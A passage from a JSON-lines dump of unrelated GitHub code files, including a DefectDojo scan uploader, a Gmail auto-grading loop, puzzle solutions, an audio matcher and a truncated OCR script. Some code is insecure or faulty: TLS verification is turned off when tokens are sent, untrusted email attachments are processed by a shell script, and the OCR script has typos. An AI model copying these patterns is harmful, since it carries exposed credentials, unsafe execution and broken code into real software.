ent_emb.view(1 , n_ent_b , d_model)\n\n\t\tq = self.WQ(query)\n\t\tent = self.WK(ent_emb) * mask #(bsz , n_ent_b , d_model)\n\n\t\t#pdb.set_trace()\n\n\t\tweight = (q.view(bsz,y_len,1,d_model) * ent.view(bsz,1,n_ent_b,d_model)).sum(-1) #(bsz , y_len , n_ent_b)\n\t\tweight -= (1-mask.view(bsz,1,n_ent_b)) * 100000\n\t\tweight = F.softmax(weight , dim = -1) #(bsz , y_len , n_ent_b)\n\n\t\t#if need result, make a weighted sum\n\t\tif self.give_me_result:\n\t\t\tv = self.WK(ent_emb) * mask #(bsz , n_ent_b , d_model)\n\t\t\tweight = weight.view(bsz , y_len , 1 , n_ent_b)\n\t\t\tv = v.view(bsz , 1 , n_ent_b , d_model)\n\t\t\tv = tc.matmul(weight * (d_model**-0.5) , v).view(bsz , y_len , d_model)\n\t\t\tv = self.l_norm(self.WO(v))\n\t\t\treturn v\n\n\t\t#else, make weight padded and return it\n\t\tif n_ent_b < max_entity_number:\n\t\t\tweight = tc.cat([weight , weight.new_zeros(bsz , y_len , max_entity_number - n_ent_b)] , dim = -1)\n\n\t\treturn weight","repo_name":"FFTYYY/GraphWriter","sub_path":"graphwriter/other_layers.py","file_name":"other_layers.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"4125314697","text":"import asyncio\nimport json\nimport tempfile\nfrom datetime import date\nfrom pprint import pformat\nfrom typing import List, Tuple, cast\nfrom urllib.parse import urlparse\n\nimport requests\nimport yarl\nfrom pydantic import AnyUrl, BaseModel\n\nimport app.secbot.inputs.gitlab.handlers.defectdojo.api as defectdojo\nfrom app.secbot import logger\nfrom app.secbot.inputs.gitlab.schemas import AnyGitlabModel\nfrom app.secbot.inputs.gitlab.schemas.output_responses import OutputFinding\nfrom app.secbot.schemas import Severity\n\nWORKER_TO_SCAN_TYPE_MAPPER = {\n \"gitleaks\": \"Gitleaks Scan\",\n}\n\n\nclass OutputResultObject(BaseModel):\n data: AnyGitlabModel\n worker: str\n result: str\n\n\nclass DefectDojoCredentials(BaseModel):\n url: AnyUrl\n secret_key: str\n user: str\n lead_id: int\n\n\ndef handle_dd_response(resp, context=\"\", raise_on_error=True):\n if (\n resp.response_code not in (200, 201)\n or resp.success is not True\n or isinstance(resp.data, str)\n ):\n if context:\n context = f\", context: {context}\"\n error_msg = (\n f\"[!] Error. Message: {resp.message}. \"\n f\"Status_code: {resp.response_code}, data: {pformat(resp.data)}, {context}\"\n )\n if raise_on_error:\n raise RuntimeError(error_msg)\n if isinstance(resp.data, dict) or isinstance(resp.data, list):\n return resp.data\n try:\n return json.loads(resp.data)\n except Exception:\n return {\"error\": str(resp.data)}\n # return json data if everything is good\n return resp.data\n\n\nasync def dd_prepare(\n credentials: DefectDojoCredentials,\n product_type: str,\n product_name: str,\n product_description: str,\n repo_url: AnyUrl,\n name: str,\n commit_hash: str,\n description: str,\n):\n dd = defectdojo.DefectDojoAPIv2(\n credentials.url,\n credentials.secret_key,\n credentials.user,\n debug=False,\n timeout=360,\n )\n # Check if product type already exists. Create one if it doesn't exist\n product_type_dd = await dd.list_products_type(name=product_type)\n product_type_dd_parsed = handle_dd_response(product_type_dd, product_type)\n product_types = cast(List[dict], product_type_dd_parsed[\"results\"])\n if len(product_types) > 0:\n product_types = [pt for pt in product_types if pt[\"name\"] == product_type]\n if len(product_types) > 0:\n product_type_id = product_types[0][\"id\"]\n logger.info(\n f\"[x] Product type '{product_type}' already exists, getting the first one (#{product_type_id})\"\n )\n else:\n # product type is being created with a direct API call due to the absence of an appropriate\n # wrapper method in defectdojo_apiv2\n try:\n logger.info(f\"[x] Create product type {product_type}\")\n # todo: async\n response = requests.post(\n f\"{credentials.url}/api/v2/product_types/\",\n headers={\"Authorization\": f\"Token {credentials.secret_key}\"},\n json={\"name\": product_type},\n verify=False,\n )\n response.raise_for_status()\n product_type_id = response.json()[\"id\"]\n except Exception:\n logger.info(f'[!] Error. Cannot create product type \"{product_type}\"')\n raise\n\n # Check if product already exists. Create one if it doesn't exist\n product_dd = await dd.list_products(name=product_name)\n product_dd_parsed = handle_dd_response(product_dd, product_name)\n products = cast(List[dict], product_dd_parsed[\"results\"])\n if len(products) > 0:\n products = [\n product\n for product in products\n if product[\"name\"] == product_name\n and product[\"prod_type\"] == product_type_id\n ]\n if len(products) > 0:\n product_id = products[0][\"id\"]\n logger.info(\n f\"[x] Product '{product_name}' already exists, getting the first one (#{product_id})\"\n )\n else:\n # create product if it doesn't exist\n logger.info(f\"[x] Create product {product_name}\")\n product = await dd.create_product(\n product_name,\n product_description,\n product_type_id,\n )\n product = handle_dd_response(product, product_name)\n product_id = product[\"id\"]\n\n engagement_dd = await dd.list_engagements(name=name)\n engagement_dd_parsed = handle_dd_response(engagement_dd, name)\n engagements = cast(List[dict], engagement_dd_parsed[\"results\"])\n if len(engagements) > 0:\n engagements = [\n engagement\n for engagement in engagements\n if engagement[\"name\"] == name and engagement[\"product\"] == product_id\n ]\n if len(engagements) > 0:\n engagement_id = engagements[0][\"id\"]\n engagement_name = engagements[0][\"name\"]\n logger.info(\n f\"[x] Engagement '{engagement_name}' already exists, getting the first one (#{engagement_id})\"\n )\n else:\n # create the engagement if we didn't find one\n engagement_data = {\n \"name\": f\"{name}\",\n \"product_id\": product_id,\n \"lead_id\": credentials.lead_id,\n \"status\": \"Completed\",\n \"target_start\": f'{date.today().strftime(\"%Y-%m-%d\")}',\n \"target_end\": f'{date.today().strftime(\"%Y-%m-%d\")}',\n \"engagement_type\": \"CI/CD\",\n \"deduplication_on_engagement\": False,\n \"build_id\": f\"{name}\",\n \"commit_hash\": f\"{commit_hash}\",\n \"description\": f\"Latest commit by {description}\",\n \"source_code_management_uri\": f\"{repo_url}\",\n }\n\n engagement = await dd.create_engagement(\n name=engagement_data[\"name\"],\n product_id=engagement_data[\"product_id\"],\n lead_id=engagement_data[\"lead_id\"],\n status=engagement_data[\"status\"],\n target_start=engagement_data[\"target_start\"],\n target_end=engagement_data[\"target_end\"],\n engagement_type=engagement_data[\"engagement_type\"],\n deduplication_on_engagement=engagement_data[\"deduplication_on_engagement\"],\n build_id=engagement_data[\"build_id\"],\n commit_hash=engagement_data[\"commit_hash\"],\n description=engagement_data[\"description\"],\n source_code_management_uri=engagement_data[\"source_code_management_uri\"],\n )\n engagement = handle_dd_response(engagement, name)\n engagement_name = engagement[\"name\"]\n engagement_id = engagement[\"id\"]\n logger.info(f\"[x] Engagement was created: {engagement_name} #{engagement_id}\")\n logger.info(f\"[x] Check product at {credentials.url}/product/{product_id}\")\n logger.info(\n f\"[x] Check engagement at {credentials.url}/engagement/{engagement_id}\"\n )\n return engagement_id\n\n\nasync def dd_upload(\n credentials: DefectDojoCredentials,\n engagement_id,\n scan_type,\n report_file,\n tag: str,\n minimum_severity=\"High\",\n):\n dd = defectdojo.DefectDojoAPIv2(\n credentials.url,\n credentials.secret_key,\n credentials.user,\n debug=False,\n timeout=360,\n )\n # scan_type - e.g. Nuclei Scan\n valid_scan_type = WORKER_TO_SCAN_TYPE_MAPPER.get(scan_type, scan_type)\n upload_data = {\n \"engagement_id\": f\"{engagement_id}\",\n \"scan_type\": f\"{valid_scan_type}\",\n \"file\": f\"{report_file}\",\n \"active\": True,\n \"verified\": False,\n \"close_old_findings\": False,\n \"skip_duplicates\": False,\n \"scan_date\": f'{date.today().strftime(\"%Y-%m-%d\")}',\n \"minimum_severity\": f\"{minimum_severity}\",\n }\n upload = await dd.upload_scan(\n engagement_id=upload_data[\"engagement_id\"],\n scan_type=upload_data[\"scan_type\"],\n file=upload_data[\"file\"],\n active=upload_data[\"active\"],\n verified=upload_data[\"verified\"],\n close_old_findings=upload_data[\"close_old_findings\"],\n skip_duplicates=upload_data[\"skip_duplicates\"],\n scan_date=upload_data[\"scan_date\"],\n minimum_severity=upload_data[\"minimum_severity\"],\n tags=tag, # list of tags, but we will use only commit hash id\n )\n if not upload.success:\n raise RuntimeError(upload.data)\n return upload\n\n\nasync def dd_findings_by_test(credentials: DefectDojoCredentials, test_id: int):\n dd = defectdojo.DefectDojoAPIv2(\n credentials.url,\n credentials.secret_key,\n credentials.user,\n debug=False,\n timeout=360,\n )\n findings = await dd.list_findings(\n active=\"true\",\n duplicate=\"false\",\n test_id_in=[test_id],\n # NOTE(ivan.zhirov): Temporary solution before the pagination system\n # will be added\n # TODO(ivan.zhirov): Implement proper pagination\n limit=500,\n )\n return handle_dd_response(findings, str(test_id))\n\n\nasync def dd_get_test(\n credentials: DefectDojoCredentials,\n test_id: int,\n):\n dd = defectdojo.DefectDojoAPIv2(\n credentials.url,\n credentials.secret_key,\n credentials.user,\n debug=False,\n timeout=360,\n )\n test = await dd.get_test(test_id)\n test = handle_dd_response(test, str(test_id))\n return test\n\n\nasync def send_result(\n credentials: DefectDojoCredentials,\n output_result: OutputResultObject,\n) -> Tuple[int, List[OutputFinding]]:\n web_url = output_result.data.project.web_url\n product_type = urlparse(web_url).hostname\n product_name = output_result.data.project.path_with_namespace\n commit_hash = output_result.data.commit.id\n eng_id = await dd_prepare(\n credentials,\n product_type=product_type,\n product_name=product_name,\n product_description=web_url,\n repo_url=output_result.data.commit.url.replace(\"/-/commit/\", \"/-/blob/\"),\n name=yarl.URL(output_result.data.path).path,\n commit_hash=commit_hash,\n description=output_result.data.commit.author.email,\n )\n with tempfile.NamedTemporaryFile(prefix=\"dd_output_\") as tmp_file:\n with open(tmp_file.name, \"wb\") as tmp_file_write:\n tmp_file_write.write(output_result.result.encode())\n\n test_upload = await dd_upload(\n credentials,\n engagement_id=eng_id,\n scan_type=output_result.worker,\n report_file=tmp_file.name,\n tag=commit_hash,\n )\n test_upload_id = test_upload.data[\"test_id\"]\n for i in range(30):\n test = await dd_get_test(credentials, test_upload_id)\n if test[\"percent_complete\"] == 100:\n break\n await asyncio.sleep(10)\n else:\n raise RuntimeError(\n f\"Took too much time to handle the output, test_id={test_upload_id}\"\n )\n\n await asyncio.sleep(120) # wait for deduplication\n\n response = await dd_findings_by_test(credentials, test_upload_id)\n findings = [\n OutputFinding(\n # todo: do smth with types\n title=finding[\"title\"],\n severity=Severity(finding[\"severity\"]),\n url=str(\n yarl.URL(credentials.url).with_path(f\"finding/{str(finding['id'])}\")\n ),\n )\n for finding in response[\"results\"]\n ]\n return test_upload_id, findings\n","repo_name":"exness/security-bot","sub_path":"app/secbot/inputs/gitlab/handlers/defectdojo/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":11365,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"29"} +{"seq_id":"22041285065","text":"from collections import Counter\n\n\nclass Solution:\n def checkInclusion(self, s1: str, s2: str) -> bool:\n # sliding window to check if all s1 chars are in substring of s2\n left = 0\n cnts = Counter(s1)\n for right, char in enumerate(s2):\n if char in cnts and cnts[char] > 0:\n cnts[char] -= 1\n else:\n while s2[left] != char:\n cnts[s2[left]] += 1\n left += 1\n left += 1\n \n if right - left + 1 == len(s1):\n return True\n \n return False\n\ns1 = \"xyz\"\ns2 = \"xyyzx\"\nprint(Solution().checkInclusion(s1, s2))","repo_name":"hiroto0222/CodeQuestions","sub_path":"LeetCode/medium/567.py","file_name":"567.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19745165537","text":"from __future__ import print_function\n\nimport mimetypes\nimport pickle\nimport os.path\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\nimport subprocess\nimport base64\nimport email\nimport time\nfrom datetime import datetime\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/gmail.modify']\n\n\ndef run_shell_script(name):\n try:\n subprocess.call([\"sh\", name], stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n except Exception as error:\n print('An error occurred: %s' % error)\n\n\ndef get_feedback(name):\n try:\n f = open(name, \"r\")\n text = f.read()\n f.close()\n return text\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef get_msg_all(service, user_id):\n try:\n return service.users().messages().list(userId=user_id).execute()\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef get_msg(service, user_id, msg_id):\n try:\n return service.users().messages().get(userId=user_id, id=msg_id, format='metadata').execute()\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef load_attachments(service, user_id, msg_id, store_dir):\n try:\n message = service.users().messages().get(userId=user_id, id=msg_id).execute()\n for part in message['payload']['parts']:\n if(part['filename'] and part['body'] and part['body']['attachmentId']):\n attachment = service.users().messages().attachments().get(id=part['body']['attachmentId'], userId=user_id, messageId=msg_id).execute()\n file_data = base64.urlsafe_b64decode(attachment['data'].encode('utf-8'))\n path = ''.join([store_dir, part['filename']])\n f = open(path, 'wb')\n f.write(file_data)\n f.close()\n except Exception as error:\n print('An error occurred: %s' % error)\n\n\ndef find_msg_ids(service, subject):\n try:\n msg_all = get_msg_all(service, 'me').get('messages')\n msg_id_list = []\n for msg_info in msg_all:\n msg_id = msg_info.get('id')\n msg = get_msg(service, 'me', msg_id)\n label_ids = msg.get('labelIds')\n if label_ids[0] != 'UNREAD':\n continue\n payload = msg.get('payload')\n headers = payload.get('headers')\n for info in headers:\n if info.get('name') == 'Subject' and info.get('value') == subject:\n msg_id_list.append(msg_id)\n return msg_id_list\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef find_sender_email(service, msg_id):\n try:\n msg = get_msg(service, 'me', msg_id)\n payload = msg.get('payload')\n headers = payload.get('headers')\n for info in headers:\n if info.get('name') == 'Return-Path':\n return info.get('value')\n return None\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef create_msg(sender, to, subject, message_text):\n \"\"\"Create a message for an email.\n\n Args:\n sender: Email address of the sender.\n to: Email address of the receiver.\n subject: The subject of the email message.\n message_text: The text of the email message.\n\n Returns:\n An object containing a base64url encoded email object.\n \"\"\"\n message = MIMEText(message_text)\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n raw_message = base64.urlsafe_b64encode(message.as_string().encode(\"utf-8\"))\n return {'raw': raw_message.decode(\"utf-8\")}\n\n\ndef create_msg_with_attachment(sender, to, subject, message_text, file):\n \"\"\"Create a message for an email.\n\n Args:\n sender: Email address of the sender.\n to: Email address of the receiver.\n subject: The subject of the email message.\n message_text: The text of the email message.\n file: The path to the file to be attached.\n\n Returns:\n An object containing a base64url encoded email object.\n \"\"\"\n message = MIMEMultipart()\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n\n msg = MIMEText(message_text)\n message.attach(msg)\n\n content_type, encoding = mimetypes.guess_type(file)\n\n if content_type is None or encoding is not None:\n content_type = 'application/octet-stream'\n\n main_type, sub_type = content_type.split('/', 1)\n\n if main_type == 'text':\n fp = open(file, 'rb')\n msg = MIMEText(fp.read().decode(\"utf-8\"), _subtype=sub_type)\n fp.close()\n elif main_type == 'image':\n fp = open(file, 'rb')\n msg = MIMEImage(fp.read(), _subtype=sub_type)\n fp.close()\n elif main_type == 'audio':\n fp = open(file, 'rb')\n msg = MIMEAudio(fp.read(), _subtype=sub_type)\n fp.close()\n else:\n fp = open(file, 'rb')\n msg = MIMEBase(main_type, sub_type)\n msg.set_payload(fp.read())\n fp.close()\n filename = os.path.basename(file)\n msg.add_header('Content-Disposition', 'attachment', filename=filename)\n message.attach(msg)\n\n raw_message = base64.urlsafe_b64encode(message.as_string().encode(\"utf-8\"))\n return {'raw': raw_message.decode(\"utf-8\")}\n\n\ndef create_draft(service, user_id, message_body):\n \"\"\"Create and insert a draft email. Print the returned draft's message and id.\n\n Args:\n service: Authorized Gmail API service instance.\n user_id: User's email address. The special value \"me\"\n can be used to indicate the authenticated user.\n message_body: The body of the email message, including headers.\n\n Returns:\n Draft object, including draft id and message meta data.\n \"\"\"\n try:\n message = {'message': message_body}\n draft = service.users().drafts().create(userId=user_id, body=message).execute()\n print(\"Draft id: %s\\nDraft message: %s\" % (draft['id'], draft['message']))\n return draft\n except Exception as e:\n print('An error occurred: %s' % e)\n return None\n\n\ndef send_msg(service, user_id, message):\n \"\"\"Send an email message.\n\n Args:\n service: Authorized Gmail API service instance.\n user_id: User's email address. The special value \"me\"\n can be used to indicate the authenticated user.\n message: Message to be sent.\n\n Returns:\n Sent Message.\n \"\"\"\n try:\n msg = service.users().messages().send(userId=user_id, body=message).execute()\n print('Message Id: %s' % msg['id'])\n return msg\n except Exception as e:\n print('An error occurred: %s' % e)\n return None\n\n\ndef remove_label_from_msg(service, msg_id, label):\n try:\n service.users().messages().modify(userId='me', id=msg_id, body={'removeLabelIds': [label]}).execute()\n except Exception as e:\n print('An error occurred: %s' % e)\n\n\ndef main():\n \"\"\"\n Shows basic usage of the Gmail API.\n \"\"\"\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n profile = service.users().getProfile(userId='me').execute()\n from_email = profile.get('emailAddress')\n subject = 'TDT4102 feedback'\n filename = 'feedback.txt'\n\n while True:\n try:\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(current_time, \"--> Check for new emails\")\n msg_id_list = find_msg_ids(service, 'TDT4102')\n for msg_id in msg_id_list:\n subprocess.call([\"rm -f handin.zip\"], shell=True)\n load_attachments(service, 'me', msg_id, './')\n run_shell_script(\"test_code.sh\")\n to_email = find_sender_email(service, msg_id)\n text = get_feedback(filename)\n msg = create_msg_with_attachment(from_email, to_email, subject, text, filename)\n send_msg(service, 'me', msg)\n print(\"Email sent to \" + to_email + \" from \" + from_email)\n remove_label_from_msg(service, msg_id, 'UNREAD')\n time.sleep(5)\n except Exception as error:\n print('An error occurred: %s' % error)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"martinty/gmail-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32342615689","text":"import time\nstart = time.time()\n#---------------------------\ndef Values(array):\n return [i[1] for i in array]\ndef Straight(array1):\n if array1[0]+1 == array1[1] and array1[1] + 1 == array1[2] and array1[2] +1 == array1[3] and array1[3] + 1 == array1[4]:\n return True\n return False\n\ndef RStraight(array):\n array.sort()\n isStraight = Straight(array)\n if isStraight and max(array) == 14:\n return True,True\n return (False,isStraight)\n\ndef Flush(array):\n if array[0][0] == array[1][0] and array[2][0] == array[1][0] and array[2][0] == array[3][0] and array[3][0] == array[4][0]:\n return True\n return False\n\ndef Royal(arrayv,arrays):\n flush = Flush(arrays)\n straight = RStraight(arrayv)\n if straight[0] and flush:\n return [True]*3\n return False,straight[1],flush\n\ndef cardsWithSameValues(array):\n values = {}\n Foak,Toak,FH,TP = [False]*4\n OP = [False,0]\n for i in array:\n values[i] = 0\n for i in array:\n values[i] += 1\n keys = list(values.keys())\n if len(values) == 2:\n \n if values[keys[0]] == 4 or values[keys[1]] == 4:\n print('k0 ',keys[0],'k1 ',keys[1])\n Foak = True\n else:\n FH = True\n elif len(values) == 3:\n if values[keys[0]] == 3 or values[keys[1]] == 3 or values[keys[2]] == 3:\n Toak = True\n else:\n TP = True\n elif len(values) == 4:\n i = 0\n while values[keys[i]] < max(values.values()):\n i+=1\n OP = True,keys[i]\n return (Foak,FH,Toak,TP,OP)\n\n\npoker_hands = open('/home/adam/Documents/programming/python3/p054_poker.txt','r').read().split('\\n')\ncards = [i.split(' ') for i in poker_hands[:-1]]\nfor i in range(len(cards)):\n for j in range(len(cards[i])):\n a = cards[i][j][0]\n cards[i][j] = [cards[i][j][1]]\n \n if a <= '9':\n cards[i][j].append(int(a))\n elif a == 'T':\n cards[i][j].append(10)\n elif a == 'J':\n cards[i][j].append(11)\n elif a == 'Q':\n cards[i][j].append(12)\n elif a == 'K':\n cards[i][j].append(13)\n else:\n cards[i][j].append(14)\n cards[i] = [cards[i][0:5],cards[i][5:]]\n\nwins = 0\nprint(cards[0])\nfor e,hands in enumerate(cards):\n winner = 0\n hands_values = Values(hands[0]),Values(hands[1])\n straight = [False, False]\n flush = [False, False]\n royal = [False, False]\n hv = [False,False]\n Foak = [False, False]\n Toak = [False, False]\n FH = [False, False]\n TP = [False, False]\n OP = [[False,0],[False,0]]\n for j in range(1):\n royal[0],straight[0],flush[0] = Royal(hands_values[0],hands[0])\n royal[1],straight[1],flush[1] = Royal(hands_values[1],hands[1])\n if royal[0] + royal[1]:\n #print(\"royal \",end=' ')\n hv[0] = royal[0]\n hv[1] = royal[1]\n break\n if (straight[0] and flush[0]) or (straight[1] and flush[1]):\n #print(\"straight flush \",straight,flush,end=' ')\n hv[0] = straight[0]\n hv[1] = straight[1]\n break\n a = cardsWithSameValues(hands_values[0])\n b = cardsWithSameValues(hands_values[1])\n \n #Foak[0],FH[0],Toak[0],TP[0],OP[0] = cardsWithSameValues(hands_values[0])#[::-1]\n #Foak[1],FH[1],Toak[1],TP[1],OP[1] = cardsWithSameValues(hands_values[1])\n Foak[0] = a[0]\n FH[0] = a[1]\n Toak[0] = a[2]\n TP[0] = a[3]\n OP[0] = a[4]\n Foak[1] = b[0]\n FH[1] = b[1]\n Toak[1] = b[2]\n TP[1] = b[3]\n OP[1] = b[4]\n #print(OP)\n if Foak[0] + Foak[1]:\n #print(\"Foak \",Foak,end=' ')\n hv[0] = Foak[0]\n hv[1] = Foak[1]\n break\n if FH[0] + FH[1]:\n #print(\"Full House \",end=' ')\n hv[0] = FH[0]\n hv[1] = FH[1]\n break\n if flush[0] + flush[1]:\n #print(\"Flush \",end=' ')\n hv[0] = flush[0]\n hv[1] = flush[1]\n break\n if straight[0] + straight[1]:\n #print(\"straight \",straight,end=' ')\n hv[0] = straight[0]\n hv[1] = straight[1]\n break\n if Toak[0] + Toak[1]:\n #print(\"toak \",end=' ')\n hv[0] = Toak[0]\n hv[1] = Toak[1]\n break\n if TP[0] + TP[1]:\n #print(\"tp \",end=' ')\n hv[0] = TP[0]\n hv[1] = TP[1]\n break\n if OP[0][0] + OP[1][0]:\n #print(\"op \",end=' ')\n if OP[0][0] and OP[1][0]:\n hv[0] = OP[0][1] > OP[1][1]\n hv[1] = not hv[0]\n else:\n hv[0] = OP[0][0]\n hv[1] = OP[1][0]\n break\n if hv[0] == hv[1]:\n m = [max(hands_values[0]), max(hands_values[1])]\n while m[0] == m[1]:\n hands_values[0].remove(m[0])\n hands_values[1].remove(m[1])\n m = [max(hands_values[0]), max(hands_values[1])]\n winner = 1 if m[0] > m[1] else 2\n else:\n winner = 1 if hv[0] > hv[1] else 2\n wins += winner%2\n #print(wins, e)\nprint(wins)\n#---------------------------\nprint(time.time()-start,\" ------seconds------\\n\")\n","repo_name":"Dzem-z/project-Euleler-solutions","sub_path":"python_solutions/euler54.py","file_name":"euler54.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3866254913","text":"import librosa as sa\nfrom dtw import dtw\nfrom numpy.linalg import norm\nimport os\n\ndef getFiles(path):\n objects = []\n for currentDir,subdirs,files in os.walk(path):\n for file in files:\n if file.endswith('.wav'):\n path = os.path.join(currentDir,file)\n objects.append(path) \n return objects\nfiles= getFiles(\"data/cmd\")\n\nin_file=files[3]\nresult_file=\"xxxxx\"\nresultdist=-100\nx,sr = sa.load(in_file)\nmfcc_1 = sa.feature.mfcc(x,sr)\nfor index in range(len(files)):\n if index == 3:\n continue\n else:\n tmp_file = files[index]\n tmp,sr_tmp = sa.load(tmp_file)\n mfcc_tmp = sa.feature.mfcc(tmp,sr_tmp)\n dist,cost,acc_cost,path = dtw(mfcc_1.T,mfcc_tmp.T,dist=lambda x,y: norm(x-y,ord=1))\n if resultdist == -100:\n resultdist = dist\n result_file = tmp_file\n else:\n if dist len(required):\n grade_request = ' '.join(args[1:]).strip()\n ronanda.db.update_character(name=message.author.nick, grade=grade_request)\n embed = discord.Embed(\n colour=discord.Colour.from_rgb(210, 190, 100),\n title=\":white_check_mark: Changement de grade effectué\",\n description=\"Changement du grade de {officier}\".format(officier=officer)\n )\n embed.add_field(name=\"Nouveau grade\",\n value=\"```{}```\".format(ronanda.get_grade(message.author.nick)),\n inline=False)\n embed.set_thumbnail(url=str(Seal.LSPD))\n await message.channel.send(embed=embed)\n else:\n embed = discord.Embed(\n colour=discord.Colour.from_rgb(210, 190, 100),\n title=\":information_source: Syntaxe\",\n description=\"Modifier son grade.\"\n )\n embed.set_thumbnail(url=str(Seal.LSPD))\n embed.add_field(name=\"Syntaxe\",\n value=\"```!grade ```\",\n inline=False)\n embed.add_field(name=\"Exemple\",\n value=\"```!grade Officier II```\",\n inline=False)\n embed.add_field(name=\"Votre grade actuel ({})\".format(message.author.nick),\n value=\"`{}`\".format(ronanda.get_grade(message.author.nick)),\n inline=False)\n await message.channel.send(embed=embed)\n","repo_name":"ronanda5/bot-ronanda","sub_path":"commands/command_grade.py","file_name":"command_grade.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14499125423","text":"# -*- coding: utf-8 -*-\n\nfrom unittest import TestCase\nfrom lampwick.encoding_options import EncodingOptions\n\n\nclass TestMovie(TestCase):\n\n def test_init(self):\n base_options = {\n 'video_codec': 'h264'\n }\n options = EncodingOptions(base_options)\n\n print(options)\n print(options.as_parameters())\n","repo_name":"sdispater/lampwick","sub_path":"tests/test_encoding_options.py","file_name":"test_encoding_options.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"18724507384","text":"import os\n\nPREFIX_OP = 'prefix_op.txt'\nPREFIX_OUT = 'prefix_out.txt'\nRACE_OP = 'race_op.txt'\nRACE_OUT = 'race_out.txt'\nIMG = 'pm.img'\nPREFIX_IMG = 'prefix.img'\n\nGDB_TEMPLATE = os.environ['DURINN_HOME'] + '/trace_checker/checker/gdb_script'\nGDB_SCRIPT = 'gdb_script'\nCRASH_IMG = 'crash.img'\nVAL_OP = 'val_op.txt'\nVAL_OUT = 'val_out.txt'\nORACLE_OUT = 'oracle.txt'\n","repo_name":"cosmoss-jigu/durinn","sub_path":"trace_checker/lib/filenames.py","file_name":"filenames.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"43461715108","text":"from imutils.object_detection import non_max_suppression\nimport numpy as np\nimport argparse\nimport time\nimport cv2\n\n# OCR tool for extracting text from images\nfrom PIL import Image\nimport pytesseract\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\n\nap.add_argument(\"-i\", \"--image\", type=str, help=\"path to the receipt\")\nap.add_argument(\"-east\", \"--east\", type=str, help=\"path to input EAST text detector\")\nap.add_argument(\"-c\", \"--min-confidence\", type=float, default=0.5, help=\"minimum probability required to inspect a region\")\nap.add_argument(\"-w\", \"--width\", type=int, default=320, help=\"resized image width (should be multiple of 32)\")\nad.add_argument(\"-e\", \"--height\", type=int, default=320, help=\"resized image height (should be multiple of 32)\")\n\nargs = vars(ap.parse_args())\n\n# load the receipt and grab the image dimensions\nimage = cv2.imgread(args[\"image\"])\norig = image.copy()\n(H, W) = image.shape[:2]\n\n# set the new width and height and then determine \n# the ratio in change for both the width and height\n(newW, newH) = (args[\"width\"], args[\"height\"])\nrW = W / float(newW)\nrH = H / float(newH)\n\n#resize the image and grab the new image dimensions\nimage = cv2.resize(image, (newW, newH))\n(H, W) = image.shape[:2]\n\nlayerNames = [\n # This is the first layer of the network.\n # This layer is responsible for giving the probability of a region containing text or not.\n \"feature_fusion/Conv_7/Sigmoid\",\n # This layer is responsible for giving the bounding box coordinates of the text in the image.\n # Later I'd like to see if we can find a layer for determining the angle of the text.\n \"feature_fusion/concat_3\"\n]\n\n# load the pre-trained EAST text detector\nprint(\"[INFO] loading EAST text detector...\")\nnet = cv2.dnn.readNet(args[\"east\"])\n\n# construct a blob from the image and then preform \n# a forward pass of the model to obtain the two output layer sets\n# `blobFromImage` essentially converts the image into a blob of data.\n# The way it does this is by getting the mean of the RGB\n# values of the image and subtraction the mean from each RGB value\n# relative to the image. This is done to normalize the image.\n# Read more here: https://pyimagesearch.com/2017/11/06/deep-learning-opencvs-blobfromimage-works/\nblob = cv2.dnn.blobFromImage(image, 1.0, (W, H), (123.68, 116.78, 103.94), swapRB=True, crop=False)\n# start a time to determine how long it takes to run the model\nstart = time.time()\n# Set the blob as the input to the network\nnet.setInput(blob)\n# Deconstruct `scores` and `geometry` from the output of the network via `forward`\n#look more into the forward function\n(scores, geometry) = net.forward(layerNames)\n# End the timer\nend = time.time()\n\n# show timing information on text prediction\nprint(\"[INFO] text detection took {:.6f} seconds\".format(end - start))\n\n# grab the number of rows and columns from the scores 